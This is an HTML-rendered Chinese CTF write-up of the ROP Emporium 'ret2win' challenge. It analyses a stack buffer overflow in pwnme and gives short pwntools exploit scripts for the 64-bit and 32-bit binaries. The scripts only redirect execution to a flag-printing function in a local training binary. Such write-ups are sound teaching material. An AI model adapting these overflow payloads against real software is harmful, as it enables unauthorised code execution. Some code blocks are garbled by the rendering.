<!DOCTYPE html>
<html class="writer-html5" lang="zh-CN" >
<head>
  <meta charset="utf-8" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>} &mdash; rop emporium writeup  文档</title>
      <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
      <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
  <!--[if lt IE 9]>
    <script src="_static/js/html5shiv.min.js"></script>
  <![endif]-->
  
        <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>
        <script src="_static/jquery.js"></script>
        <script src="_static/underscore.js"></script>
        <script src="_static/doctools.js"></script>
        <script src="_static/translations.js"></script>
    <script src="_static/js/theme.js"></script>
    <link rel="index" title="索引" href="genindex.html" />
    <link rel="search" title="搜索" href="search.html" /> 
</head>

<body class="wy-body-for-nav"> 
  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >
            <a href="index.html" class="icon icon-home"> rop emporium writeup
          </a>
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="search.html" method="get">
    <input type="text" name="q" placeholder="在文档中搜索" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>
        </div><div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <!-- Local TOC -->
              <div class="local-toc"><ul>
<li><a class="reference internal" href="#">}</a></li>
</ul>
</div>
        </div>
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"><nav class="wy-nav-top" aria-label="Mobile navigation menu" >
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="index.html">rop emporium writeup</a>
      </nav>

      <div class="wy-nav-content">
        <div class="rst-content">
          <div role="navigation" aria-label="Page navigation">
  <ul class="wy-breadcrumbs">
      <li><a href="index.html" class="icon icon-home"></a> &raquo;</li>
      <li>}</li>
      <li class="wy-breadcrumbs-aside">
            <a href="_sources/README.rst.txt" rel="nofollow"> 查看页面源码</a>
      </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
             
  <p>via：<a class="reference external" href="https://ropemporium.com/challenge/ret2win.html">https://ropemporium.com/challenge/ret2win.html</a></p>
<p># ret2win</p>
<p>Locate a method within the binary that you want to call and do so by overwriting a saved return address on the stack.
Click below to download the binary.</p>
<p>[64bit](<a class="reference external" href="https://ropemporium.com/binary/ret2win.zip">https://ropemporium.com/binary/ret2win.zip</a>) [32bit](<a class="reference external" href="https://ropemporium.com/binary/ret2win32.zip">https://ropemporium.com/binary/ret2win32.zip</a>)</p>
<p>## No spoilers here</p>
<p>Take the time to read these challenge pages, there aren’t any spoilers and they contain important information that could save you some frustration. If you’re unfamiliar with ROP tools of the trade then check out the [beginner’s guide](<a class="reference external" href="https://ropemporium.com/guide.html">https://ropemporium.com/guide.html</a>). As it states; you’ll feed each binary with a quantity of garbage followed by your ROP chain. In this case there is a <strong>magic method</strong> we want to call and we’ll do so by overwriting a saved return address on the stack. Certainly nothing that could be called a ‘chain’ by any stretch of the imagination but we’ve got to start somewhere. We’ll do a little RE to confirm some information but nothing serious.</p>
<p>### What am I doing</p>
<p>These challenges use the usual CTF objective of retrieving the contents of a file named “flag.txt” from a remote machine by exploiting a given binary. The two most common courses of action are to somehow read flag.txt back to us directly or drop a shell and read it yourself. Let’s see if ret2win has an easy way to do either of these. We’ll use the following nm one-liner to check method names. <cite>nm ret2win|grep ‘ t ‘</cite> will tell us that the suspiciously named function ‘ret2win’ is present and r2 confirms that it will cat the flag back to us:</p>
<p>![ret2win function](ret2win_ret2win.png)</p>
<p>### Double check</p>
<p>For a quick and dirty confirmation of how many bytes are needed to cause an overflow in the 64bit binary you can use <cite>sudo dmesg -C</cite> to clear the kernel ring buffer, run the program and type 40 characters followed by 5 capital Xs (why let the As have all the fun) then type <cite>dmesg -t</cite> to see output that hopefully looks similar to the sample below:</p>
<p><code class="docutils literal notranslate"><span class="pre">`</span>
<span class="pre">ret2win[14987]:</span> <span class="pre">segfault</span> <span class="pre">at</span> <span class="pre">a5858585858</span> <span class="pre">ip</span> <span class="pre">00000a5858585858</span> <span class="pre">sp</span> <span class="pre">00007ffe8c93d4e0</span> <span class="pre">error</span> <span class="pre">14</span> <span class="pre">in</span> <span class="pre">libc-2.24.so[7fef0e075000+195000]</span>
<span class="pre">`</span></code></p>
<p>It’s worth confirming this before each challenge but typically you’ll need 40 bytes of garbage to reach the saved return address in the 64bit binaries and 44 bytes in the 32bit binaries.</p>
<p>### Let’s do this</p>
<p>You can solve this challenge with a variety of tools, even the echo command will work, although pwntools is suggested. If you decided to go for a more complex exploit than a ret2win then be aware that input is truncated for these simpler challenges. Find out how many bytes you have to construct your chain in each challenge using <cite>ltrace &lt;binary&gt;</cite> and looking at the call to fgets(). If your ROP chain seems perfect but the binary is crashing before printing the flag see the [common pitfalls](<a class="reference external" href="https://ropemporium.com/guide.html#Common">https://ropemporium.com/guide.html#Common</a> pitfalls) section of the beginner’s guide, especially if you’re using <strong>Ubuntu 18.04</strong>.</p>
<p>上面是官方 ret2win 页面的描述</p>
<p>直接入手吧</p>
<p>### X64</p>
<p>![image-20200430001415853](image-20200430001415853.png)</p>
<p>直接看 <cite>pwnme</cite> 函数</p>
<p><a href="#id1"><span class="problematic" id="id2">``</span></a><a href="#id3"><span class="problematic" id="id4">`</span></a>c
void pwnme(void)</p>
<dl>
<dt>{</dt><dd><p>char local_28 [32];</p>
<p>memset(local_28,0,0x20);
puts(</p>
<blockquote>
<div><p>“For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stackbuffer;nWhat could possibly go wrong?”
);</p>
</div></blockquote>
<dl class="simple">
<dt>puts(</dt><dd><p>“You there madam, may I have your input please? And don't worry about null bytes, we'reusing fgets!n”
);</p>
</dd>
</dl>
<p>printf(”&gt; “);
fgets(local_28,0x32,stdin);
return;</p>
</dd>
</dl>
<section id="id5">
<h1>}<a class="headerlink" href="#id5" title="永久链接至标题"></a></h1>
<p>看起来没有什么大问题</p>
<p>但是看汇编</p>
<p><a href="#id6"><span class="problematic" id="id7">``</span></a><a href="#id8"><span class="problematic" id="id9">`</span></a>asm
004007f6 48 8b 15        MOV        RDX,qword ptr [stdin]</p>
<blockquote>
<div><p>73 08 20 00</p>
</div></blockquote>
<p>004007fd 48 8d 45 e0     LEA        RAX=&gt;local_28,[RBP + -0x20]
00400801 be 32 00        MOV        ESI,0x32</p>
<blockquote>
<div><p>00 00</p>
</div></blockquote>
<p>00400806 48 89 c7        MOV        RDI,RAX
00400809 e8 12 fe        CALL       fgets</p>
<blockquote>
<div><p>ff ff</p>
</div></blockquote>
<p>0040080e 90              NOP
0040080f c9              LEAVE
00400810 c3              RET
<a href="#id10"><span class="problematic" id="id11">``</span></a><a href="#id12"><span class="problematic" id="id13">`</span></a></p>
<p>看到了吗，往 <cite>[RBP + -0x20]</cite> 写入 <cite>0x32</cite> Bytes</p>
<p>溢出了，能覆盖到 <cite>RBP + 8</cite> （返回地址）</p>
<p>要填充 <cite>0x20 + 0x8 = 028</cite></p>
<p>然后我们要跳转到 <cite>ret2win</cite> 函数</p>
<p>![image-20200430002412161](image-20200430002412161.png)</p>
<p>假惺惺的用 <cite>nm</cite> 看 <cite>ret2win</cite> 的 <cite>plt</cite></p>
<p>![image-20200430002526158](image-20200430002526158.png)</p>
<p><cite>0x0000000000400811</cite></p>
<p>payload：</p>
<p><a href="#id14"><span class="problematic" id="id15">``</span></a><a href="#id16"><span class="problematic" id="id17">`</span></a>python
from pwn import *</p>
<p>p = process(“./ret2win”)
ret2win = 0x0000000000400811
exp = “A” * 0x28
exp += p64(ret2win)
p.sendline(exp)
p.interactive()
<a href="#id18"><span class="problematic" id="id19">``</span></a><a href="#id20"><span class="problematic" id="id21">`</span></a></p>
<p>![image-20200430002935202](image-20200430002935202.png)</p>
<p>pwn!</p>
<p>### X86</p>
<p>在 <cite>pwnme</cite> 函数里面，也是一样的漏洞</p>
<p>其实这个跟上面的差不多，区别就在于 x86 在调用函数时是用栈来函数</p>
<p>![image-20200430003445466](image-20200430003445466.png)</p>
<p><a href="#id22"><span class="problematic" id="id23">``</span></a><a href="#id24"><span class="problematic" id="id25">`</span></a>asm
08048648 6a 32           PUSH       0x32
0804864a 8d 45 d8        LEA        EAX=&gt;local_2c,[EBP + -0x28]
0804864d 50              PUSH       EAX
0804864e e8 bd fd        CALL       fgets</p>
<blockquote>
<div><p>ff ff</p>
</div></blockquote>
<p><a href="#id26"><span class="problematic" id="id27">``</span></a><a href="#id28"><span class="problematic" id="id29">`</span></a></p>
<p>计算填充长度`0x28 + 0x4 = 0x2c` 这个 <cite>0x4</cite> 是 <cite>ebp</cite> 的长度</p>
<p>![image-20200430003627761](image-20200430003627761.png)</p>
<p><cite>ret2win</cite> 的地址：<cite>0x08048659</cite></p>
<p>Payload:</p>
<p><a href="#id30"><span class="problematic" id="id31">``</span></a><a href="#id32"><span class="problematic" id="id33">`</span></a>python
from pwn import *</p>
<p>p = process(“./ret2win32”)
ret2win = 0x08048659
exp = “A” * 0x2c
exp += p32(ret2win)
p.sendline(exp)
p.interactive()
<a href="#id34"><span class="problematic" id="id35">``</span></a><a href="#id36"><span class="problematic" id="id37">`</span></a></p>
<p>![image-20200430004126231](image-20200430004126231.png)</p>
<p>pwn!</p>
</section>


           </div>
          </div>
          <footer>

  <hr/>

  <div role="contentinfo">
    <p>&#169; 版权所有 2021, scriptk1d.</p>
  </div>

  利用 <a href="https://www.sphinx-doc.org/">Sphinx</a> 构建，使用了 
    <a href="https://github.com/readthedocs/sphinx_rtd_theme">主题</a>
    由 <a href="https://readthedocs.org">Read the Docs</a>开发.
   

</footer>
        </div>
      </div>
    </section>
  </div>
  <script>
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(true);
      });
  </script> 

</body>
</html>